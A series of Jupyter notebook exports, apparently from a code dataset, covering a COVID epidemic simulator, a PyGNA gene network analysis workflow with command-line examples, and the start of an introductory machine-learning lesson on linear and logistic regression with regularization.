image = np.array(ndimage.imread(fname, flatten=False))
my_image = scipy.misc.imresize(image, size=(64,64)).reshape((1, 64*64*3)).T
my_image_prediction = predict(my_image, parameters)
plt.imshow(image)
print("Your algorithm predicts: y = " + str(np.squeeze(my_image_prediction)))
###Output
Your algorithm predicts: y = 3
|
share/codit/notebooks/overview.ipynb | ###Markdown
We begin with boilerplate:
###Code
%matplotlib inline
import matplotlib.pyplot as plt
plt.rcParams["figure.figsize"] = [12, 5]
%load_ext autoreload
%autoreload 2
import numpy as np
import random
import pandas as pd
import os
import sys
import logging
logging.basicConfig(format='%(asctime)s %(levelname)s:%(message)s', level=logging.INFO)
###Output
_____no_output_____
###Markdown
Covid epidemic simulator
###Code
from codit.disease import Covid
from codit.outbreak import Outbreak
from codit.population.networks.city import CityPopulation
from codit.population.covid import PersonCovid
import codit.society as society
import codit.config
###Output
_____no_output_____
###Markdown
Baseline config of the simulation
###Code
codit.config.print_baseline_config()
###Output
CROSS_IMMUNITY {'other': {'other'}, 'SARS-CoV-2': {'SARS-CoV-2', 'B.1.1.7'}, 'B.1.1.7': {'SARS-CoV-2', 'B.1.1.7'}}
DAILY_TEST_CAPACITY_PER_HEAD 0.0075
DAYS_BEFORE_INFECTIOUS 4
DAYS_INFECTIOUS_TO_SYMPTOMS 2
DAYS_OF_SYMPTOMS 5
DEFAULT_COVID SARS-CoV-2
DURATION_OF_ISOLATION 10
MEAN_NETWORK_SIZE 9.0
PROB_APPLY_FOR_TEST_IF_SYMPTOMS 0.75
PROB_GET_TEST_IF_TRACED 0.75
PROB_INFECT_IF_TOGETHER_ON_A_DAY {'SARS-CoV-2': 0.025, 'B.1.1.7': 0.039}
PROB_ISOLATE_IF_SYMPTOMS 0.75
PROB_ISOLATE_IF_TESTPOS 0.3
PROB_ISOLATE_IF_TRACED 0.3
PROB_NON_C19_SYMPTOMS_PER_DAY 0.01
PROB_SYMPTOMATIC 0.6
PROB_TEST_IF_REQUESTED 1
PROB_TRACING_GIVEN_CONTACT 0.6000000000000001
SIMULATOR_PERIODS_PER_DAY 1
TEST_DAYS_ELAPSED 1
VACCINATION_IMMUNITY {'AstraZeneca': {'SARS-CoV-2', 'B.1.1.7'}, 'Pfizer': {'SARS-CoV-2', 'B.1.1.7'}}
_PROPORTION_OF_INFECTED_WHO_GET_TESTED 0.44999999999999996
_TARGET_R0 1.4
###Markdown
We are going to work with a small town of a few thousand people.
###Code
pop = CityPopulation(560000, society.Society())
###Output
2021-03-28 19:59:40,688 INFO:Building a set of 224000 households from which to build a population
2021-03-28 20:00:33,047 INFO:220051 households of mean size 2.54
2021-03-28 20:00:35,895 INFO:101252 buildings of mean size 5.53
2021-03-28 20:01:00,548 INFO:1461 classrooms of mean size 28.87
2021-03-28 20:01:00,792 INFO:99 care_homes of mean size 105.68
2021-03-28 20:01:01,845 INFO:65449 workplaces of mean size 5.62
2021-03-28 20:01:07,712 INFO:0% of workplaces closed by lockdown, leaving 54869 open, of average Income Decile 5.07 (and st dev 3.13).
2021-03-28 20:01:07,878 INFO:0% of classrooms closed by lockdown, leaving 1185 open, of average Income Decile 4.75 (and st dev 3.10).
2021-03-28 20:01:07,912 INFO:Adding 276204 permanent contact groups
2021-03-28 20:01:08,060 INFO:Adding 28000 ephemeral contact pairs
2021-03-28 20:01:08,845 INFO:Adding 168417 contacts each within one of the 101252 buildings (contact density of 0.75)
###Markdown
Randomly, we put them into fixed and overlapping social groupings, where each person has a small network.
###Code
nets = [len(p.contacts) for p in pop.people]
np.mean(nets)
plt.hist(nets, cumulative=True, density=True, bins=2000)
plt.title('Distribution of network sizes')
plt.axvline(np.mean(nets), color='r')
plt.grid()
###Output
_____no_output_____
###Markdown
Finally ready to simulate: We will place the population that we have created, into various settings and societies in the upcoming simulations
###Code
POP_SIZE = len(pop.people)
PREVALENCE = 1/560 * 4
SCALE_SETTINGS = dict(n_days = 201, pop_size = POP_SIZE, seed_size = int(POP_SIZE*PREVALENCE), population=pop)
SCALE_SETTINGS
###Output
_____no_output_____
###Markdown
Our baseline simulation is of a runaway infection.We start with 400 people infected in a population of 56,000.We begin by studying a society where people don't know whether or how to self-isolate:
###Code
s_basic = society.Society(config=dict(PROB_ISOLATE_IF_SYMPTOMS = 0))
o_basic = Outbreak(s_basic, Covid(), **SCALE_SETTINGS).simulate()
o_basic.plot(title=str(SCALE_SETTINGS))
###Output
2021-03-28 20:38:36,570 INFO: Realized R0 of early infections is 1.48
2021-03-28 20:38:36,570 INFO: 56.8 percent of the population was infected during the epidemic
###Markdown
Lets put that on a log scale:
###Code
o_basic.plot(logy=True, title='Non-isolating society: doubling time of about 15 days')
###Output
2021-03-28 20:38:40,830 INFO: Realized R0 of early infections is 1.48
2021-03-28 20:38:40,831 INFO: 56.8 percent of the population was infected during the epidemic
###Markdown
Next, suppose that people know to isolate if they show symptoms, and 75% do so - this is similar to what is going on in the UK now:
###Code
s_isolate = society.Society(config=dict(PROB_ISOLATE_IF_SYMPTOMS = 0.75))
o_isolate = Outbreak(s_isolate, Covid(), **SCALE_SETTINGS).simulate()
o_isolate.plot(title='Isolating society: small but nasty wave')
###Output
2021-03-28 20:45:01,048 INFO: Realized R0 of early infections is 1.14
2021-03-28 20:45:01,049 INFO: 27.5 percent of the population was infected during the epidemic
###Markdown
So, now we can add testing: * initially, here, lets suppose that positive test results are just ignored, while -ve results let people out of isolation:
###Code
s_testignored = society.TestingSociety(config=dict(PROB_ISOLATE_IF_TESTPOS=0))
o_testignored = Outbreak(s_testignored, Covid(), **SCALE_SETTINGS).simulate()
o_testignored.plot(title="Testing, but +ve results ignored: in a sense this is counterproductive \n"
"(-ve result puts people back into society, and into harm's way)")
###Output
2021-03-28 20:54:03,948 INFO: Realized R0 of early infections is 1.21
2021-03-28 20:54:03,950 INFO: 31.9 percent of the population was infected during the epidemic
###Markdown
* Now suppose that people respond to test results, some of the time:
###Code
o_test = Outbreak(society.TestingSociety(), Covid(), **SCALE_SETTINGS).simulate()
o_test.plot(title="Testing, paid attention to a bit")
###Output
2021-03-28 21:03:20,224 INFO: Realized R0 of early infections is 1.16
2021-03-28 21:03:20,225 INFO: 30.5 percent of the population was infected during the epidemic
###Markdown
We add contact-tracing and isolation:
###Code
o_test_trace = Outbreak(society.TestingTracingSociety(), Covid(), **SCALE_SETTINGS).simulate()
o_test_trace.plot(title='Testing, tracing, and isolating', secondary_y=['prop_infected'])
###Output
2021-03-28 21:13:00,473 INFO: Realized R0 of early infections is 0.97
2021-03-28 21:13:00,474 INFO: 10.1 percent of the population was infected during the epidemic
###Markdown
UK society, however, is characterized by testing bottlenecks:
###Code
import codit.society.alternatives as alternatives
o_UK = Outbreak(alternatives.UKSociety(), Covid(), **SCALE_SETTINGS).simulate()
o_UK.plot(title='UK society with TTI bottlenecks - people isolate for longer')
o_contact_test = Outbreak(society.ContactTestingSociety(), Covid(), **SCALE_SETTINGS).simulate()
o_contact_test.plot(title="Testing, tracing&testing&isolating: "
"Also testing contacts doesn't make much difference",
secondary_y=['prop_infected'])
census = pop.census
infector_nets = [len(census[p.infectors[0]].contacts) for p in pop.people if p.infectors]
infected_nets = [len(p.contacts) for p in pop.people if p.infected]
def most_connected_infector(guy):
if len(guy.infectors) == 0:
raise NotImplementedError
return max([len(i.contacts) for i in guy.chain(census) if i is not guy])
max_contacts_chain = [most_connected_infector(person)
for person in pop.people
if len(person.infectors)]
opts = dict(cumulative=True, bins=200, density=True, histtype='step')
plt.hist(nets, color='k', **opts)
plt.hist(infected_nets, color='r', **opts)
plt.hist(infector_nets, color='b', **opts)
plt.hist(max_contacts_chain, color='g', **opts)
plt.title("CDFs of valency for: people (black); infected (red); infectors (blue); max connected in chains (green)")
plt.axhline(1, color='k'); plt.axvline(0, color='k')
plt.grid()
###Output
_____no_output_____ |
Pathway Analysis/Case Studies/code/PyGNA workflow.ipynb | ###Markdown
PyGNA Workflow The workflow involves the following three steps1. Generate GMT files from CSV files in case GMT file isn't available2. Generate matrices3. Perform analysis for single or multiple genesets. Get the results in the form of pdf or png Data Loading Generating GMT files from a table This is when you have a table data from csv or Deseq. The following utlity can be used to generate gmt files from table data.
###Code
$ pygna geneset-from-table <filename>.csv <setname> <filename>.gmt --name-colum <gene_names_column> --filter-column <filter-col> <'less'> --threshold <th> --descriptor <descriptor string>
$ pygna geneset-from-table <deseq>.csv diff_exp <deseq>.gmt --descriptor deseq#for table from deseq
###Output
_____no_output_____
###Markdown
Merging different Genesets It is also possible to merge different setnames in a single gmt file through the function generate-group-gmt. You can override the default parameters, to match the columns in your table.*generate-group-gmt* generates a GMT file of multiple setnames. From the table file, it groups the names in the group_col (the column you want to use to group them) and prints the genes in the name_col. Set the descriptor according to your needs. OR you could simply concatenate all the files. Computing rwr and sp matrices
###Code
$ pygna build-distance-matrix <network> <network_sp>.hdf5
$ pygna build-rwr-diffusion <network> --output-file <network_rwr>.hdf5
###Output
_____no_output_____
###Markdown
Topology Tests
###Code
$ pygna test-topology-module <network> <geneset> <table_results_test>_topology_module.csv --number-of-permutations 100 --cores 4
$ pygna test-topology-rwr <network> <geneset> <network_rwr>.hdf5 <table_results_test>_topology_rwr.csv --number-of-permutations 100 --cores 4
$ pygna test-topology-internal-degree <network> <geneset> <table_results_test>_topology_internal_degree.csv --number-of-permutations 100 --cores 4
$ pygna test-topology-sp <network> <geneset> <network_sp>.hdf5 <table_results_test>_topology_sp.csv --number-of-permutations 100 --cores 4
$ pygna test-topology-total-degree <network> <geneset> <table_results_test>_topology_total_degree.csv --number-of-permutations 100 --cores 4
###Output
_____no_output_____
###Markdown
Association tests If only A_geneset_file is passed the analysis is run on all the pair of sets in the file, if both A_geneset_file and B_geneset_file are passed, one can specify the setnames for both, if there is only one geneset in the file, setname_X can be omitted, if both sets are in the same file, B_geneset_file can be not specified, but setnames are needed
###Code
pygna test-association-rwr [-h] [--setname-a SETNAME_A] [--file-geneset-b FILE_GENESET_B] [--setname-b SETNAME_B] [--size-cut SIZE_CUT] [-k] [-c CORES] [-i]
[--number-of-permutations NUMBER_OF_PERMUTATIONS] [--n-bins N_BINS] [--results-figure RESULTS_FIGURE]
network-file file-geneset-a rwr-matrix-filename output-table
Performs comparison of network location analysis.
It computes a p-value for the shortest path distance
between two genesets being smaller than expected by chance.
If only A_geneset_file is passed the analysis is run on all the pair of sets in the file, if both
A_geneset_file and B_geneset_file are passed, one can specify the setnames for both, if there is only one
geneset in the file, setname_X can be omitted, if both sets are in the same file, B_geneset_file can be not
specified, but setnames are needed.
positional arguments:
network-file network file
file-geneset-a GMT geneset file
rwr-matrix-filename .hdf5 file with the RWR matrix obtained by pygna
output-table output results table, use .csv extension
optional arguments:
-h, --help show this help message and exit
--setname-a SETNAME_A
Geneset A to analyse (default: -)
--file-geneset-b FILE_GENESET_B
GMT geneset file (default: -)
--setname-b SETNAME_B
Geneset B to analyse (default: -)
--size-cut SIZE_CUT removes all genesets with a mapped length < size_cut (default: 20)
-k, --keep if true, keeps the geneset B unpermuted (default: False)
-c CORES, --cores CORES
Number of cores for the multiprocessing (default: 1)
-i, --in-memory set if you want the large matrix to be read in memory (default: False)
--number-of-permutations NUMBER_OF_PERMUTATIONS
number of permutations for computing the empirical pvalue (default: 500)
--n-bins N_BINS if >1 applies degree correction by binning the node degrees and sampling according to geneset distribution (default: 1)
--results-figure RESULTS_FIGURE
heatmap of results (default: -)
$ pygna test-association-sp <network> <geneset> <network_sp>.hdf5 <table_results_test>_association_sp.csv -B <geneset_pathways> --keep --number-of-permutations 100 --cores 4
$ pygna test-association-rwr <network> <geneset> <network_rwr>.hdf5 <table_results_test>_association_rwr.csv -B <geneset_pathways> --keep --number-of-permutations 100 --cores 4
###Output
_____no_output_____
###Markdown
Visualisation
###Code
Usage: pygna paint-datasets-stats [-h] [-a ALTERNATIVE] table-filename output-file #GNT barplot
Usage: pygna paint-summary-gnt [-h] [-s SETNAME] [-t THRESHOLD] [-c COLUMN_FILTER] [--larger] [--less-tests LESS_TESTS] output-figure [input_tables [input_tables ...]]#GNT Summary
Usage: pygna paint-comparison-matrix [-h] [-r] [-s] [-a] table-filename output-file#heatmap
Usage: pygna paint-volcano-plot [-h] [-r] [-i ID_COL] [--threshold-x THRESHOLD_X] [--threshold-y THRESHOLD_Y] [-a] table-filename output-file#volcanoplot
###Output
_____no_output_____
###Markdown
Snakemake Workflow 1) Install Snakemake2) Make changes to the config file and rules files accordingly(changing the path/parameters etc)3) Run the analysisAll the steps from above are boiled down to one or two steps.
###Code
snakemake --use-conda -n#dry run
snakemake --snakefile Snakefile_paper --configfile config_paper --use-conda --cores $N#to replicate the results of the paper
###Output
_____no_output_____
###Markdown
To obtain all the results for the single geneset (avoid the first step to have the full regeneration of all files):
###Code
snakemake snakemake --snakefile Snakefile_paper single_all --configfile config_paper_single.yaml -t
snakemake --snakefile Snakefile_paper single_all --configfile config_paper_single.yaml --use-conda
###Output
_____no_output_____
###Markdown
To obtain the results for the multi geneset
###Code
snakemake snakemake --snakefile Snakefile_paper multi_all --configfile config_paper_multi.yaml -t
snakemake --snakefile Snakefile_paper multi_all --configfile config_paper_multi.yaml
###Output
_____no_output_____
###Markdown
Paper Use Case Using Commandline Since the distance matrices are already built and the merged geneset(gmt) already obtained, topology and association analysis can be carried out directly. **Topology Analysis**
###Code
#file names: biogrid_3.168_filtered.tsv merged.gmt goslim.gmt interactome_RWR.hdf5 interactome_SP.hdf5
cd /home/gee3/Documents/PyGNA/data_tcga_workflow/external/
! pygna test-topology-module biogrid_3.168_filtered.tsv merged.gmt table_topology_module3.csv --number-of-permutations 100 --cores 2
! pygna test-topology-rwr biogrid_3.168_filtered.tsv merged.gmt interactome_RWR.hdf5 tableresults_topology_rwr.csv --number-of-permutations 10 --cores 3
! pygna test-topology-internal-degree biogrid_3.168_filtered.tsv merged.gmt table_topology_internal_degree.csv --number-of-permutations 10 --cores 3
! pygna test-topology-sp biogrid_3.168_filtered.tsv merged.gmt interactome_SP.hdf5 table_topology_sp.csv --number-of-permutations 10 --cores 2
! pygna test-topology-total-degree biogrid_3.168_filtered.tsv merged.gmt table_topology_total_degree.csv --number-of-permutations 100 --cores 4
###Output
_____no_output_____
###Markdown
**Association Tests** In a GNA two genesets are tested for their association. When testing a signle geneset against many pathways it is recommended the –keep flag is used. This way, while resampling only the geneset a will be randomly permuted and the geneset b is going to be kept as it is. This strategy is more conservative and is helpful in testing whether the tested geneset is more strongly connected to the pathway (or any other geneset of interest) than expected by chance.
###Code
! pygna test-association-rwr biogrid_3.168_filtered.tsv merged.gmt interactome_RWR.hdf5 table_association_rwr.csv --file-geneset-b goslim_entrez.gmt --keep --number-of-permutations 100 --cores 4
###Output
_____no_output_____
###Markdown
If you don't include the --results-figure flag at the comparison step, plot the matrix as follows
###Code
! pygna paint-comparison-matrix table_association_rwr.csv heatmap_association_rwr.png --rwr --annotate
###Output
_____no_output_____
###Markdown
If setname B is not passed, the analysis is run between each couple of setnames in the geneset as follows(The only difference between single geneset and multiple genests. No within comprison in multi):
###Code
! pygna test-association-rwr biogrid_3.168_filtered.tsv merged.gmt interactome_RWR.hdf5 table_within_comparison_rwr.csv --number-of-permutations 100 --cores 2
! pygna paint-comparison-matrix table_within_comparison_rwr.csv heatmap_within_comparison_rwr.png --rwr --single-geneset
! pygna test-association-sp biogrid_3.168_filtered.tsv merged.gmt interactome_SP.hdf5 table_association_SP.csv --file-geneset-b goslim_entrez.gmt --keep --number-of-permutations 2 --cores 1
! pygna paint-comparison-matrix table_association_sp.csv heatmap_association_sp.png --rwr --annotate#default heatmap
! pygna test-association-sp biogrid_3.168_filtered.tsv merged.gmt interactome_RWR.hdf5 table_within_comparison_sp.csv --number-of-permutations 2 --cores 2
! pygna paint-comparison-matrix table_within_comparison_sp.csv heatmap_within_comparison_rwr.png --rwr --single-geneset
###Output
_____no_output_____
###Markdown
**Diagnostic** Distribution plotWhen running a statistical test, one might want to visually assess the null distribution. By passing -d \ through command line, a distribution plot of the empirical null is shown for each test.
###Code
! pygna test-topology-total-degree biogrid_3.168_filtered.tsv merged.gmt diagnstic_total_degree.csv -d "diagnostic/" --number-of-permutations 2 --cores 2
###Output
_____no_output_____
###Markdown
**Visualisation** There are four main types of figures currently implemented in PyGNA, namely bar plots, point plots, heatmaps and volcano plots, to visualize to GNT and GNA results.Barplots are used to plot the GNT results for a single statistic. For each geneset a red bar represents the observed statistic, whereas a blue one represents the average of the empirical null distribution. Conversely, a dot plot can be used to summarize multiple tests for the same geneset. In order to show all the results in the same figure, the observed values are transformed in absolute normalized z-scores, such that all significant tests have z-score >0 and are marked with a red dot. GNA results can instead be visualised on heatmaps, with the color gradients used to report the strength of association between two genesets. When an all-vs-all test is conducted, a lower triangular matrix is shown, with stars denoting significance. If, instead, a M-vs-N test was conducted, a complete heatmap would be included in the plot.Alternatively, volcano plots can be used to visualize one-vs-many GNA results, for testing a geneset against a large number of datasets (e.g. gene ontologies). The plot shows the normalized z-score on the x-axis and the −log10 of the p-value adjusted to control the False Discovery Rate (FDR) on the y-axis. Significant results are shown with red crosses, whereas not significant associations are represented by blue dots.Can be annotated to fid out the top 5 terms.
###Code
! pygna paint-datasets-stats table_topology_module.csv gnt_tm.png #GNT barplot
! pygna paint-summary-gnt dotplt.png #GNT Summary
! pygna paint-comparison-matrix table_association_sp.csv withncomp_sp.pdf #heatmap
! pygna paint-volcano-plot table_association_sp.csv volcno_sp.png #volcanoplot
###Output
_____no_output_____
###Markdown
**Benchmarking** GNT and GNA benchmarking using SBM
###Code
! pygna generate-gnt-sbm "benchmarking/gnt_sbm.tsv" 'benchmarking/gnt_sbm.gmt'
! pygna generate-gna-sbm "benchmarking/gna_sbm.tsv" 'benchmarking/gna_sbm.gmt'
###Output
[50, 50, 50, 50, 50, 50, 700]
INFO:root:Network written on benchmarking/gnt_sbm.tsv
[50, 50, 50, 50, 50, 50, 50, 50, 600]
INFO:root:Network written on benchmarking/gna_sbm.tsv
Generatedbenchmarking/gna_sbm.tsv
###Markdown
GNT and GNA benchmarking using SBM
###Code
! pygna generate-hdn-network benchmarking/ hdn_network
###Output
INFO:root:Reject=True
INFO:root:Reject=True
INFO:root:Nodes: 1000, in LCC: 999
INFO:root:Reject=True
INFO:root:Nodes: 1000, in LCC: 999
INFO:root:Reject=True
INFO:root:Nodes: 1000, in LCC: 999
INFO:root:Reject=False
INFO:root:Nodes: 1000, in LCC: 1000
INFO:root:Network written on benchmarking/hdn_network_s_0_network.tsv
INFO:root:Reject=True
INFO:root:Reject=False
INFO:root:Nodes: 1000, in LCC: 1000
INFO:root:Network written on benchmarking/hdn_network_s_1_network.tsv
INFO:root:Reject=True
INFO:root:Reject=False
INFO:root:Nodes: 1000, in LCC: 1000
INFO:root:Network written on benchmarking/hdn_network_s_2_network.tsv
INFO:root:Reject=True
INFO:root:Reject=True
INFO:root:Nodes: 1000, in LCC: 999
INFO:root:Reject=False
INFO:root:Nodes: 1000, in LCC: 1000
INFO:root:Network written on benchmarking/hdn_network_s_3_network.tsv
INFO:root:Reject=True
INFO:root:Reject=False
INFO:root:Nodes: 1000, in LCC: 1000
INFO:root:Network written on benchmarking/hdn_network_s_4_network.tsv
###Markdown
Given the generated network and node list of HDNs, novel genesets made of mixtures of the two can be generate.The original network with a number of HDNs, then the partial, extended, and branching genesets can be generated. **Adding Extended Genesets** Creates new genesets from the vip list, number of genesets and portion of genes can be specified by input. The final new geneset is going to be formed by: percentage ev * HDN_total + ratio* percentage ev*vips total.
###Code
!pygna hdn-add-extended input-geneset-file#Genesets are input to identify
###Output
_____no_output_____
###Markdown
**Adding Partial Genesets**Creates new genesets from the vip list, number of genesets and portion of genes can be specified by input.
###Code
!pygna hdn-add-partial input-geneset-file
###Output
_____no_output_____
###Markdown
**Adding Branching Genesets** Creates new genesets from the vip list, new genesets are created adding 1 step nodes to vips. The new genes are created as branches.
###Code
!pygna hdn-add-branching input-geneset-file
###Output
_____no_output_____ |
part1 - intro to ML/intro_to_ML.ipynb | ###Markdown
Welcome to Supervised Learning Part 1: Introduction to machine learning and the bias-variance tradeoff Instructor: Andras Zsom https://github.com/azsom/Supervised-Learning The topic of the course series: supervised Machine Learning (ML)- how to build an ML pipeline from beginning to deployment- we assume you already performed data cleaning- this is the first course out of 6 courses - **Part 1: Introduction to machine learning and the bias-variance tradeoff** - Part 2: How to prepare your data for supervised machine learning - Part 3: Evaluation metrics in supervised machine learning - Part 4: SVMs, Random Forests, XGBoost - Part 5: Missing data in supervised ML - Part 6: Interpretability- you can complete the courses in sequence or complete individual courses based on your interest Tools- we use python - pros: easy to use for a beginner programmer - cons: it is very difficult to write computationally efficient code - the divide between users and developers of python packages are wide- packages we use: sklearn, pandas, numpy, matplotlib, XGBoost, SHAP- if you are a python user, you need to know exactly what you are doing - carefully read the manual, work through the examples, test every line of code you write - good test of your understanding: could I write the function/method myself if I had to? - do not assume your code works, always test everything - there are two types of errors: - one that gives an error message - usually easy to fix - the error message tells you in which line the error occurs - read and understand the error message - if it's not obvious what the error is, read more on it on stackoverflow for example - sneaky errors without error message - these are tough! - your code runs and it gives some output but something is off - just staring at the code won't reveal the bug - print print print or use a debugger - check every line of code, trace issues through the code - to reduce the number of errors/bugs, do test-driven code development - first think about what the output of a function call/cell/piece of a piece of code should be - only then write the code - check if you got the expected output Learning objectives of this courseBy the end of the course, you will be able to- describe how a task like spam filtering can be solved with explicit coding instructions vs. a machine learning algorithm that learns from examples (training data),- summarize the similarities and differences between supervised and unsupervised ML,- list the pros and cons of supervised machine learning,- define the mathematical model behind linear and logistic regression,- explain what the loss function is,- describe the two main types of regularization and why it is important,- perform a simple train/validation/test split on IID data,- apply linear and logistic regression to datasets,- tune the regularization hyperparameter,- identify models with high bias and high variance,- select the best model and measure its performance on a previously unseen dataset, the test set. Module 1: Intro to Machine Learning Learning objectives of this module:- describe how a task like spam filtering can be solved with explicit coding instructions vs. a machine learning algorithm that learns from examples (training data),- summarize the similarities and differences between supervised and unsupervised ML,- list the pros and cons of supervised machine learning, Supervised ML- supervised ML is probably the most successful area in ML (based on economic value created) - **online advertising**: given an ad and user info, will the user click on the ad? - **real estate**: given home features, can we predict the house price? - **finance**: given an applicant and a finalcial product (e.g., a loan), will this applicant be able to successfully pay back the loan? - **health care**: given a patient, symptoms, and maybe test results, can we predict the illness? - ...- supervised ML pros: - **automation**: computers perform calculations faster than humans (and computers are cheaper) - **learn from examples**: no need to explicitly tell the computer what to do. the computer figures out what to do based on examples (data)- supervised ML con: - it can be difficult or labor-intensive to collect training data - there is no guarantee that you will be able to develop an accurate model based on the data you have Example: spam filters- Traditional coding pipeline with explicit instructions Example: spam filters- ML pipeline - the data: feature matrix (X) and target variable (Y) - X can be structured (tabular data most commonly stored in excel and csv files or SQL databases) - X can be unstructured (e.g., images, text, voice recording, video) - Y can be categorical, the problem is **classification** (e.g., click or not click on an ad, sick or not sick) - Y can be continuous, the problem is **regression** (e.g., predict house price, stock price, age) - Y can be missing, the problem is **clustering**- **we focus on structured data during the course series!** Structured data| X|feature_1|feature_2|...|feature_j|...|feature_m|Y||-|:-:|:-:|:-:|:-:|:-:|:-:|:-:||__data_point_1__|x_11|x_12|...|x_1j|...|x_1m|__y_1__||__data_point_2__|x_21|x_22|...|x_2j|...|x_2m|__y_2__||__...__|...|...|...|...|...|...|__...__||__data_point_i__|x_i1|x_i2|...|x_ij|...|x_im|__y_i__||__...__|...|...|...|...|...|...|__...__||__data_point_n__|x_n1|x_n2|...|x_nj|...|x_nm|__y_n__| Other areas of ML- unsupervised ML - only the feature matrix X is available, there is no target variable - the goal is to find structure (clusters) in the data - often used in customer segmentation- recommender systems - recommend products to a customer based on what products similar customers enjoyed- reinforcement learning - the learning system, called an agent, can observe the environment, select and perform actions, and get rewards and penalties in return. Goal: come up with strategy to maximize rewards - often used when virtual environment is available (e.g., games like go or warcraft) - sounds appealing to use in real environments (like self-driving cars) but agents learn slow, lots of cars would need to be broken to teach an agent to drive this way - deep learning - uses neural networks and often works with unstructured data - technically deep learning is supervised or unsupervised - extremely successful on large datasets Module 2: Overview of linear and logistic regression with regularization Learning objectives of this module:- define the mathematical model behind linear and logistic regression,- explain what the loss function is,- describe the two main types of regularization and why it is important, Supervised ML algorithms: three parts- 1) **a mathematical model ($f$)** is used to convert the feature values into a prediction$f(X_i) = y_i'$, where $i$ is the $i$th data point in our sample. $X_i$ is a vector and $y_i'$ is a number. - $f$ is your supervised ML algorithm - it usually has a number of intrinsic parameters - 2) **an optimization algorithm** is used to determine the intrinsic parameter values given the training set - there are various algorithms - e.g., gradient descent, backpropagation- 3) the optimization algorithm minimizes a metric called **the cost function** - the cost function is used to determine the best intrinsic parameters of one model based on the training data Linear Regression
###Code
# these lines are just illustration
# no X_train or y_train are defined yet so it won't run
from sklearn.linear_model import LinearRegression # import the model
LinReg = Linear_Regression() # initialize a simple linear regression model
LinReg.fit(X_train,y_train) # we will learn now what happens when you issue this line
###Output
_____no_output_____
###Markdown
- This is the **mathematical model**: $f(X_i) = y_i' = \theta_0 + X_{i1} \theta_1 + X_{i2} \theta_2 +$ ... $= \theta_0 + \sum_{j=1}^{m} \theta_j X_{ij} $,where $y_i'$ is the prediction of the linear regression model and $\theta$ are parameters.- The **optimization algorithm** is some form of gradient descent - we won't go into detail but the basic idea is that gradient descent will find the $\theta$ values that minimize the cost function on the training data- The **cost function** is MSE - mean squared error $MSE(y,y') = \frac{1}{n}\sum_{i=1}^{n}(y_i'-y_i)^2$ Logistic Regression
###Code
from sklearn.linear_model import LogisticRegression
LogReg = LogisticRegression() # initialize a simple logistic regression model
LogReg.fit(X_train,y_train) # we will learn what happens when you issue this line in classification
###Output
_____no_output_____
###Markdown
- name is misleading, logistic regression is for classification problems!- the model:$f(X_i) = y_i' = \frac{1}{1+e^{-z}}$, where$z = \theta_0 + \sum_{j=1}^{m} \theta_j x_{ij}$- $f(z) = \frac{1}{1+e^{-z}}$ is the sigmoid function which maps real values to be between 0 and 1 such that the real value 0 is mapped to 0.5. - the output of a sigmoid function can be thought of as a predicted probability.
###Code
import numpy as np
import matplotlib.pyplot as plt
def sigmoid(z):
return 1/(1+np.exp(-z))
z = np.linspace(-7,7,50)
print(z)
plt.plot(z,sigmoid(z))
plt.xlabel('input of linear regression')
plt.ylabel('predicted probability')
plt.title('sigmoid transformation')
plt.savefig('figures/sigmoid_trans.png',dpi=300)
plt.show()
###Output
[-7. -6.71428571 -6.42857143 -6.14285714 -5.85714286 -5.57142857
-5.28571429 -5. -4.71428571 -4.42857143 -4.14285714 -3.85714286
-3.57142857 -3.28571429 -3. -2.71428571 -2.42857143 -2.14285714
-1.85714286 -1.57142857 -1.28571429 -1. -0.71428571 -0.42857143
-0.14285714 0.14285714 0.42857143 0.71428571 1. 1.28571429
1.57142857 1.85714286 2.14285714 2.42857143 2.71428571 3.
3.28571429 3.57142857 3.85714286 4.14285714 4.42857143 4.71428571
5. 5.28571429 5.57142857 5.85714286 6.14285714 6.42857143
6.71428571 7. ]
###Markdown
- The **optimization algorithm** is some form of gradient descent- the logloss metric is used as a **cost function** in logistic regression$L(\theta) = - \frac{1}{N}\sum_{i=1}^{n} [y_i\ln(y_i') + (1-y_i)\ln(1-y_i')]$ - two scenarios: - y_i = 0 - left term disappears - y_i = 1 - right term disappears- log(0) is undefined - $y_i'$ is usually replaced with $\max(\min(y_i',1-10^{-15}),10^{-15})$ to avoid this issue**The extreme cases**- the classifier is confidently wrong - $y_i' = 10^{-15}$ for points in class 1 - $y_i' = 1 - 10^{-15}$ for points in class 0$logloss = -\frac{1}{N}\sum \ln(10^{-15}) = -\ln(10^{-15})$ $logloss \sim 34.5 $- the classifier is correct - $y_i' = 10^{-15}$ for points in class 0 - $y_i' = 1 - 10^{-15}$ for points in class 1$logloss = -\frac{1}{N}\sum (1-0)(1-\ln(1-10^{-15})) = 10^{-15}$ for class 0$logloss = -\frac{1}{N}\sum 1*\ln(1-10^{-15}) = 10^{-15}$ for class 1$logloss \sim 0$- the logloss metric also needs to be minimized Regularization- models tend to overfit on the training data and such models don't perform well on previously unseen points - a sure sign of overfitting in linear and logistic regression is huge theta values, much larger than the typical ranges of your features and target variable - overfitting means that the model fits the noise rather than the underlying structure - e.g., fitting a high degree polinomial to a roughly linearly correlated set of points- one way to address this shortcoming of ML models is regularization- let's change the cost function and add a penalty term for large thetas- **Lasso regression**: regularize using the l1 norm of theta: $L(\theta) =$ original cost $+ \color{red}{ \frac{\alpha}{m} \sum_{j=0}^{m}|\theta_j|}$ - **Ridge regression**: regularize using the l2 norm of theta: $L(\theta) =$ original cost $+ \color{red}{\frac{\alpha}{m} \sum_{j=0}^{m} \theta_j^2}$- $\alpha$ is the regularization parameter (0 or larger), it describes how much we penalize large thetas Regulariztion in linear regression- the original cost function is MSE and we add the penalty term- **Lasso regression**: regularize using the l1 norm of theta: $L(\theta) = \frac{1}{n}\sum_{i=1}^{n}[(\theta_0 + \sum_{j=1}^{m} \theta_j x_{ij}- y_i)^2] + \color{red}{ \frac{\alpha}{m} \sum_{j=0}^{m}|\theta_j|}$ - **Ridge regression**: regularize using the l2 norm of theta: $L(\theta) = \frac{1}{n}\sum_{i=1}^{n}[(\theta_0 + \sum_{j=1}^{m} \theta_j x_{ij}- y_i)^2] + \color{red}{\frac{\alpha}{m} \sum_{j=0}^{m} \theta_j^2}$ Regulariztion in logistic regression- the original cost is logloss and we add the penalty term- **Lasso regression**: regularize using the l1 norm of theta:$L(\theta) = - \frac{1}{N}\sum_{i=1}^{n} [y_i\ln(\frac{1}{1+e^{-\theta_0 + \sum_{j=1}^{m} \theta_j x_{ij}}}) + (1-y_i)\ln(1-\frac{1}{1+e^{-\theta_0 + \sum_{j=1}^{m} \theta_j x_{ij}}}))] + \color{red}{ \frac{\alpha}{m} 